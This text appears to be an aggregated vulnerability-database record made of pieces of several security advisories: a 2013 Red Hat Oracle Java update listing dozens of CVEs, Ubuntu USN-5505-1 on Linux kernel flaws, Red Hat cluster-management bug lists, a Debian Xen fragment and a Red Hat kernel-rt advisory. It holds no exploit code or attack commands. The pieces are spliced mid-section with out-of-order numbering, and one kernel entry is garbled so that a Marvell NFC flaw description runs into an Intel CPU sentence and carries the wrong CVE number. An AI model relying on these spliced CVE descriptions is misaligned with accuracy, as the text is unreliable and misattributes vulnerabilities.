CVE-2013-1569 CVE-2013-2383 CVE-2013-2384
CVE-2013-2394 CVE-2013-2414 CVE-2013-2415
CVE-2013-2416 CVE-2013-2417 CVE-2013-2418
CVE-2013-2419 CVE-2013-2420 CVE-2013-2421
CVE-2013-2422 CVE-2013-2423 CVE-2013-2424
CVE-2013-2425 CVE-2013-2426 CVE-2013-2427
CVE-2013-2428 CVE-2013-2429 CVE-2013-2430
CVE-2013-2431 CVE-2013-2432 CVE-2013-2433
CVE-2013-2434 CVE-2013-2435 CVE-2013-2436
CVE-2013-2438 CVE-2013-2439 CVE-2013-2440
=====================================================================
1. Summary:
Updated java-1.7.0-oracle packages that fix several security issues are now
available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Further
information about these flaws can be found on the Oracle Java SE Critical
Patch Update Advisory page, listed in the References section.
(CVE-2013-0401, CVE-2013-0402, CVE-2013-1488, CVE-2013-1491, CVE-2013-1518,
CVE-2013-1537, CVE-2013-1540, CVE-2013-1557, CVE-2013-1558, CVE-2013-1561,
CVE-2013-1563, CVE-2013-1564, CVE-2013-1569, CVE-2013-2383, CVE-2013-2384,
CVE-2013-2394, CVE-2013-2414, CVE-2013-2415, CVE-2013-2416, CVE-2013-2417,
CVE-2013-2418, CVE-2013-2419, CVE-2013-2420, CVE-2013-2421, CVE-2013-2422,
CVE-2013-2423, CVE-2013-2424, CVE-2013-2425, CVE-2013-2426, CVE-2013-2427,
CVE-2013-2428, CVE-2013-2429, CVE-2013-2430, CVE-2013-2431, CVE-2013-2432,
CVE-2013-2433, CVE-2013-2434, CVE-2013-2435, CVE-2013-2436, CVE-2013-2438,
CVE-2013-2439, CVE-2013-2440)
All users of java-1.7.0-oracle are advised to upgrade to these updated
packages, which provide Oracle Java 7 Update 21 and resolve these issues.
All running instances of Oracle Java must be restarted for the update to
take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
920245 - CVE-2013-0401 OpenJDK: sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly invoke the system class loader (CanSecWest 2013, 8009305, AWT)
920246 - CVE-2013-0402 Oracle JDK: unspecified JavaFX buffer overflow leading to JVM compromise (CanSecWest 2013, JavaFX)
920247 - CVE-2013-1488 OpenJDK: unspecified sanbox bypass (CanSecWest 2013, Libraries)
920248 - CVE-2013-1491 Oracle JDK: unspecified sanbox bypass (CanSecWest 2013, 2D)
952387 - CVE-2013-1537 OpenJDK: remote code loading enabled by default (RMI, 8001040)
952389 - CVE-2013-2415 OpenJDK: temporary files created with insecure permissions (JAX-WS, 8003542)
952398 - CVE-2013-2423 OpenJDK: incorrect setter access checks in MethodHandles (Hostspot, 8009677)
952509 - CVE-2013-2424 OpenJDK: MBeanInstantiator insufficient class access checks (JMX, 8006435)
952521 - CVE-2013-2429 OpenJDK: JPEGImageWriter state corruption (ImageIO, 8007918)
952524 - CVE-2013-2430 OpenJDK: JPEGImageReader state corruption (ImageIO, 8007667)
952550 - CVE-2013-2436 OpenJDK: Wrapper.convert insufficient type checks (Libraries, 8009049)
952638 - CVE-2013-2420 OpenJDK: image processing vulnerability (2D, 8007617)
952640 - CVE-2013-1558 OpenJDK: java.beans.ThreadGroupContext missing restrictions (Beans, 7200507)
952642 - CVE-2013-2422 OpenJDK: MethodUtil trampoline class incorrect restrictions (Libraries, 8009857)
952645 - CVE-2013-2431 OpenJDK: Hotspot intrinsic frames vulnerability (Hotspot, 8004336)
952646 - CVE-2013-1518 OpenJDK: JAXP missing security restrictions (JAXP, 6657673)
952648 - CVE-2013-1557 OpenJDK: LogStream.setDefaultStream() missing security restrictions (RMI, 8001329)
952649 - CVE-2013-2421 OpenJDK: Hotspot MethodHandle lookup error (Hotspot, 8009699)
952653 - CVE-2013-2426 OpenJDK: ConcurrentHashMap incorrectly calls defaultReadObject() method (Libraries, 8009063)
952656 - CVE-2013-2419 OpenJDK: font processing errors (2D, 8001031)
952657 - CVE-2013-2417 OpenJDK: Network InetAddress serialization information disclosure (Networking, 8000724)
952708 - CVE-2013-2383 OpenJDK: font layout and glyph table errors (2D, 8004986)
952709 - CVE-2013-2384 OpenJDK: font layout and glyph table errors (2D, 8004987)
952711 - CVE-2013-1569 OpenJDK: font layout and glyph table errors (2D, 8004994)
953135 - Oracle JDK: multiple unspecified JavaFX vulnerabilities fixed in 7u21 (JavaFX)
953166 - CVE-2013-1540 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)
953172 - CVE-2013-1563 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Install)
953265 - CVE-2013-2394 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (2D)
953266 - CVE-2013-2416 Oracle JDK: unspecified vulnerability fixed in 7u21 (Deployment)
953267 - CVE-2013-2418 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)
953268 - CVE-2013-2425 Oracle JDK: unspecified vulnerability fixed in 7u21 (Install)
953269 - CVE-2013-2432 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (2D)
953270 - CVE-2013-2433 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)
953272 - CVE-2013-2434 Oracle JDK: unspecified vulnerability fixed in 7u21 (2D)
953273 - CVE-2013-2435 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)
953274 - CVE-2013-2439 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Install)
953275 - CVE-2013-2440 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
java-1.7.0-oracle-1.7.0.21-1jpp.1.el5.i386.rpm
java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el5.i386.rpm
java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el5.i386.rpm
java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el5.i386.rpm
java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el5.i386.rpm
java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el5.i386.rpm
x86_64:
java-1.7.0-oracle-1.7.0.21-1jpp.1.el5.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el5.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el5.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el5.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el5.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el5.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
java-1.7.0-oracle-1.7.0.21-1jpp.1.el5.i386.rpm
java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el5.i386.rpm
java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el5.i386.rpm
java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el5.i386.rpm
java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el5.i386.rpm
java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el5.i386.rpm
x86_64:
java-1.7.0-oracle-1.7.0.21-1jpp.1.el5.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el5.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el5.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el5.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el5.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el5.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
java-1.7.0-oracle-1.7.0.21-1jpp.1.el6.i686.rpm
java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el6.i686.rpm
java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el6.i686.rpm
java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el6.i686.rpm
java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el6.i686.rpm
java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el6.i686.rpm
x86_64:
java-1.7.0-oracle-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64:
java-1.7.0-oracle-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el6.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
java-1.7.0-oracle-1.7.0.21-1jpp.1.el6.i686.rpm
java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el6.i686.rpm
java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el6.i686.rpm
java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el6.i686.rpm
java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el6.i686.rpm
java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el6.i686.rpm
x86_64:
java-1.7.0-oracle-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
java-1.7.0-oracle-1.7.0.21-1jpp.1.el6.i686.rpm
java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el6.i686.rpm
java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el6.i686.rpm
java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el6.i686.rpm
java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el6.i686.rpm
java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el6.i686.rpm
x86_64:
java-1.7.0-oracle-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.21-1jpp.1.el6.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.21-1jpp.1.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2013-0401.html
https://www.redhat.com/security/data/cve/CVE-2013-0402.html
https://www.redhat.com/security/data/cve/CVE-2013-1488.html
https://www.redhat.com/security/data/cve/CVE-2013-1491.html
https://www.redhat.com/security/data/cve/CVE-2013-1518.html
https://www.redhat.com/security/data/cve/CVE-2013-1537.html
https://www.redhat.com/security/data/cve/CVE-2013-1540.html
https://www.redhat.com/security/data/cve/CVE-2013-1557.html
https://www.redhat.com/security/data/cve/CVE-2013-1558.html
https://www.redhat.com/security/data/cve/CVE-2013-1561.html
https://www.redhat.com/security/data/cve/CVE-2013-1563.html
https://www.redhat.com/security/data/cve/CVE-2013-1564.html
https://www.redhat.com/security/data/cve/CVE-2013-1569.html
https://www.redhat.com/security/data/cve/CVE-2013-2383.html
https://www.redhat.com/security/data/cve/CVE-2013-2384.html
https://www.redhat.com/security/data/cve/CVE-2013-2394.html
https://www.redhat.com/security/data/cve/CVE-2013-2414.html
https://www.redhat.com/security/data/cve/CVE-2013-2415.html
https://www.redhat.com/security/data/cve/CVE-2013-2416.html
https://www.redhat.com/security/data/cve/CVE-2013-2417.html
https://www.redhat.com/security/data/cve/CVE-2013-2418.html
https://www.redhat.com/security/data/cve/CVE-2013-2419.html
https://www.redhat.com/security/data/cve/CVE-2013-2420.html
https://www.redhat.com/security/data/cve/CVE-2013-2421.html
https://www.redhat.com/security/data/cve/CVE-2013-2422.html
https://www.redhat.com/security/data/cve/CVE-2013-2423.html
https://www.redhat.com/security/data/cve/CVE-2013-2424.html
https://www.redhat.com/security/data/cve/CVE-2013-2425.html
https://www.redhat.com/security/data/cve/CVE-2013-2426.html
https://www.redhat.com/security/data/cve/CVE-2013-2427.html
https://www.redhat.com/security/data/cve/CVE-2013-2428.html
https://www.redhat.com/security/data/cve/CVE-2013-2429.html
https://www.redhat.com/security/data/cve/CVE-2013-2430.html
https://www.redhat.com/security/data/cve/CVE-2013-2431.html
https://www.redhat.com/security/data/cve/CVE-2013-2432.html
https://www.redhat.com/security/data/cve/CVE-2013-2433.html
https://www.redhat.com/security/data/cve/CVE-2013-2434.html
https://www.redhat.com/security/data/cve/CVE-2013-2435.html
https://www.redhat.com/security/data/cve/CVE-2013-2436.html
https://www.redhat.com/security/data/cve/CVE-2013-2438.html
https://www.redhat.com/security/data/cve/CVE-2013-2439.html
https://www.redhat.com/security/data/cve/CVE-2013-2440.html
https://access.redhat.com/security/updates/classification/#critical
http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFRcDsoXlSAg2UNWIIRAnQRAJkBOGnz8TW8LPB1Ur1msZYNqpYTowCfaOUs
Up+dHVsSUEZZ+ySDcLQZIyU=
=yeWV
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
|
|
var-202206-1106
|
Incomplete cleanup of multi-core shared buffers for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access. 7) - noarch, x86_64
3. ==========================================================================
Ubuntu Security Notice USN-5505-1
July 07, 2022
linux-lts-xenial, linux-kvm vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 ESM
- Ubuntu 14.04 ESM
Summary:
Several security issues were fixed in the Linux kernel.
Software Description:
- linux-kvm: Linux kernel for cloud environments
- linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty
Details:
Norbert Slusarek discovered a race condition in the CAN BCM networking
protocol of the Linux kernel leading to multiple use-after-free
vulnerabilities. A local attacker could use this issue to execute arbitrary
code. (CVE-2021-3609)
Likang Luo discovered that a race condition existed in the Bluetooth
subsystem of the Linux kernel, leading to a use-after-free vulnerability. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2021-3752)
It was discovered that the NFC subsystem in the Linux kernel contained a
use-after-free vulnerability in its NFC Controller Interface (NCI)
implementation. A local attacker could possibly use this to cause a denial
of service (system crash) or execute arbitrary code. (CVE-2021-3760)
Szymon Heidrich discovered that the USB Gadget subsystem in the Linux
kernel did not properly restrict the size of control requests for certain
gadget types, leading to possible out of bounds reads or writes. A local
attacker could use this to cause a denial of service (system crash) or
possibly execute arbitrary code. (CVE-2021-39685)
It was discovered that the Ion Memory Manager subsystem in the Linux kernel
contained a use-after-free vulnerability. A local attacker could possibly
use this to cause a denial of service (system crash) or execute arbitrary
code. (CVE-2021-39714)
Eric Biederman discovered that the cgroup process migration implementation
in the Linux kernel did not perform permission checks correctly in some
situations. A local attacker could possibly use this to gain administrative
privileges. (CVE-2021-4197)
Lin Ma discovered that the NFC Controller Interface (NCI) implementation in
the Linux kernel contained a race condition, leading to a use-after-free
vulnerability. A local attacker could use this to cause a denial of service
(system crash) or possibly execute arbitrary code. (CVE-2021-4202)
Sushma Venkatesh Reddy discovered that the Intel i915 graphics driver in
the Linux kernel did not perform a GPU TLB flush in some situations. A
local attacker could use this to cause a denial of service or possibly
execute arbitrary code. (CVE-2022-0330)
It was discovered that the PF_KEYv2 implementation in the Linux kernel did
not properly initialize kernel memory in some situations. A local attacker
could use this to expose sensitive information (kernel memory).
(CVE-2022-1353)
It was discovered that the virtual graphics memory manager implementation
in the Linux kernel was subject to a race condition, potentially leading to
an information leak. (CVE-2022-1419)
Minh Yuan discovered that the floppy disk driver in the Linux kernel
contained a race condition, leading to a use-after-free vulnerability. A
local attacker could possibly use this to cause a denial of service (system
crash) or execute arbitrary code. (CVE-2022-1652)
It was discovered that the Atheros ath9k wireless device driver in the
Linux kernel did not properly handle some error conditions, leading to a
use-after-free vulnerability. A local attacker could use this to cause a
denial of service (system crash) or possibly execute arbitrary code.
(CVE-2022-1679)
It was discovered that the Marvell NFC device driver implementation in the
Linux kernel did not properly perform memory cleanup operations in some
situations, leading to a use-after-free vulnerability. A local attacker
could possibly use this to cause a denial of service (system) or execute
arbitrary code. A local attacker could
possibly use this to expose sensitive information. (CVE-2022-21123)
It was discovered that some Intel processors did not completely perform
cleanup actions on microarchitectural fill buffers. A local attacker could
possibly use this to expose sensitive information. (CVE-2022-21125)
It was discovered that some Intel processors did not properly perform
cleanup during specific special register write operations. A local attacker
could possibly use this to expose sensitive information. (CVE-2022-21166)
It was discovered that the USB Gadget file system interface in the Linux
kernel contained a use-after-free vulnerability. A local attacker could use
this to cause a denial of service (system crash) or possibly execute
arbitrary code. (CVE-2022-24958)
赵子轩 discovered that the 802.2 LLC type 2 driver in the Linux kernel did not
properly perform reference counting in some error conditions. A local
attacker could use this to cause a denial of service. (CVE-2022-28356)
It was discovered that the 8 Devices USB2CAN interface implementation in
the Linux kernel did not properly handle certain error conditions, leading
to a double-free. A local attacker could possibly use this to cause a
denial of service (system crash). (CVE-2022-28388)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.04 ESM:
linux-image-4.4.0-1110-kvm 4.4.0-1110.120
linux-image-kvm 4.4.0.1110.107
Ubuntu 14.04 ESM:
linux-image-4.4.0-229-generic 4.4.0-229.263~14.04.1
linux-image-4.4.0-229-lowlatency 4.4.0-229.263~14.04.1
linux-image-generic-lts-xenial 4.4.0.229.199
linux-image-lowlatency-lts-xenial 4.4.0.229.199
linux-image-virtual-lts-xenial 4.4.0.229.199
After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel modules you might have installed.
Unless you manually uninstalled the standard kernel metapackages
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,
linux-powerpc), a standard system upgrade will automatically perform
this as well.
References:
https://ubuntu.com/security/notices/USN-5505-1
CVE-2021-3609, CVE-2021-3752, CVE-2021-3760, CVE-2021-39685,
CVE-2021-39714, CVE-2021-4197, CVE-2021-4202, CVE-2022-0330,
CVE-2022-1353, CVE-2022-1419, CVE-2022-1652, CVE-2022-1679,
CVE-2022-1734, CVE-2022-21123, CVE-2022-21125, CVE-2022-21166,
CVE-2022-24958, CVE-2022-28356, CVE-2022-28388
. Bugs fixed (https://bugzilla.redhat.com/):
2041540 - RHACM 2.4 using deprecated APIs in managed clusters
2074766 - vSphere network name doesn't allow entering spaces and doesn't reflect YAML changes
2079418 - cluster update status is stuck, also update is not even visible
2088486 - Policy that creates cluster role is showing as not compliant due to Request entity too large message
2089490 - Upgraded from RHACM 2.2-->2.3-->2.4 and cannot create cluster
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add
2097464 - ACM Console Becomes Unusable After a Time
2100613 - RHACM 2.4.6 images
2102436 - Cluster Pools with conflicting name of existing clusters in same namespace fails creation and deletes existing cluster
2102495 - ManagedClusters in Pending import state after ACM hub migration
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS
2109354 - CVE-2022-31150 nodejs16: CRLF injection in node-undici
2121396 - CVE-2022-31151 nodejs/undici: Cookie headers uncleared on cross-origin redirect
2124794 - CVE-2022-36067 vm2: Sandbox Escape in vm2
5. Description:
Red Hat Advanced Cluster Management for Kubernetes 2.3.12 images
Red Hat Advanced Cluster Management for Kubernetes provides the
capabilities to address common challenges that administrators and site
reliability engineers face as they work across a range of public and
private cloud environments. Clusters and applications are all visible and
managed from a single console—with security policy built in.
This advisory contains the container images for Red Hat Advanced Cluster
Management for Kubernetes, which fix several bugs. See the following
Release Notes documentation, which will be updated shortly for this
release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/
Security fix:
* CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS
Bug fixes:
* Remove 1.9.1 from Proxy Patch Documentation (BZ# 2076856)
* RHACM 2.3.12 images (BZ# 2101411)
3. Bugs fixed (https://bugzilla.redhat.com/):
2076856 - [doc] Remove 1.9.1 from Proxy Patch Documentation
2101411 - RHACM 2.3.12 images
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS
5. In addition this updates provides
mitigations for the "Retbleed" speculative execution attack and the
"MMIO stale data" vulnerabilities.
For additional information please refer to the following pages:
https://xenbits.xen.org/xsa/advisory-404.html
https://xenbits.xen.org/xsa/advisory-407.html
For the stable distribution (bullseye), these problems have been fixed in
version 4.14.5+24-g87d90d511c-1.
We recommend that you upgrade your xen packages.
For the detailed security status of xen please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/xen
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmLRp7MACgkQEMKTtsN8
TjbUmQ/+PCIyYjQJgGT14YBFpKnI/JjdBNRUAlSMK7k3fPhk+J8sQrRx5MqwxRm3
poejebvnbn2KS1Z/NVaiPnS40ryOOUnLBKVDAHqRvnvrc2GwEblGCmUVaBn+cn4M
2OCG2wfpgSDk4sk83obDY1qcQW/676eGY47ULwkG9C+n6wNC8FParq71sCA6UQqy
XSWlU7o7pc17l8B1c2yTzfdDeXjSaXe9pavxNXDrowLi7taeTn5GwzhH4x1fPWrs
rGHCY8+Kk8Vq8jEIYmZA7bvKuIFcWkcdQpxcAtbgUvtCRzaid19tcf9McvltivKe
HaHQhkDJxg32DHcefXMNsh+F0pgXoodh97PdqWtjs49jAkaNZb37Eyn4n7Qt4APm
4oKAT+QA5wYmfDsBzgAczzV9zgY3/nRvYKNH6q9VMOFE3gZfzdzvyHzpegf2VVtf
7DuJKTi61tlt6aSzcDHlzdUAwW7sHXKFLRxgQu6tFD7NbEHzgj0iBlcFOnKDwa2s
hHOE6Hlj1GXZUKjol5pRjnM33qGMJmRhnq45qqWaGe21r+EFw2HTAyCacJciPX+a
QZ4LEy5+zmc8LFBcZq9kZAVkc91EtTiTPjffqHaVd4eAZvxtgCbqdXFdyRZa9ZRD
+2+e1dRoiIF6L5PotQygXyKwvxU8ca6Ni9isvit3brbLjcGjhZk=
=pXvE
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: kernel-rt security and bug fix update
Advisory ID: RHSA-2022:6437-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2022:6437
Issue date: 2022-09-13
CVE Names: CVE-2022-21123 CVE-2022-21125 CVE-2022-21166
====================================================================
1. Summary:
An update for kernel-rt is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Real Time (v. 8) - x86_64
Red Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64
3. Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables
fine-tuning for systems with extremely high determinism requirements.
Bug Fix(es):
* The latest RHEL 8.6.z3 kernel changes need to be merged into the RT
source tree to keep source parity between the two kernels. (BZ#2111112)
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
5. Bugs fixed (https://bugzilla.redhat.com/):
2090237 - CVE-2022-21123 hw: cpu: Incomplete cleanup of multi-core shared buffers (aka SBDR)
2090240 - CVE-2022-21125 hw: cpu: Incomplete cleanup of microarchitectural fill buffers (aka SBDS)
2090241 - CVE-2022-21166 hw: cpu: Incomplete cleanup in specific special register write operations (aka DRPW)
6. Package List:
Red Hat Enterprise Linux Real Time for NFV (v. 8):
Source:
kernel-rt-4.18.0-372.26.1.rt7.183.el8_6.src.rpm
x86_64:
kernel-rt-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-core-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-debug-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-debug-core-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-debug-debuginfo-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-debug-devel-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-debug-kvm-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-debug-modules-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-debug-modules-extra-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-debuginfo-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-debuginfo-common-x86_64-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-devel-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-kvm-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-modules-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-modules-extra-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
Red Hat Enterprise Linux Real Time (v. 8):
Source:
kernel-rt-4.18.0-372.26.1.rt7.183.el8_6.src.rpm
x86_64:
kernel-rt-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-core-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-debug-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-debug-core-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-debug-debuginfo-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-debug-devel-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-debug-modules-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-debug-modules-extra-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-debuginfo-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-debuginfo-common-x86_64-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-devel-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-modules-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
kernel-rt-modules-extra-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBYyCCBtzjgjWX9erEAQiMVxAAj4C0/6TQ/Wts6/PsnA7c4EJbxOzcjnSf
bdJSktu0TYTmpmiZI1tZ22LbABATshxGKqzz15bFGQlIE+wHSDxN8NF86XPmdNCF
Yqi8g2YZDLeKd02ggzE8ZOcjuSdkAT09qaTP9AusbQububoCFv/dR4v0UZ3+Mpk2
Bhe1VumtyZVHt4ps06dRVthVCt4HJdPEEOFmoCE4kg+ij6x626dvRuLWFbUclhHe
qg+5JOBLJx9UCMHMS5X7qrdySfLw6xrqX0QM18ElmCTtnfJ03FQjzw6j6F0gV17a
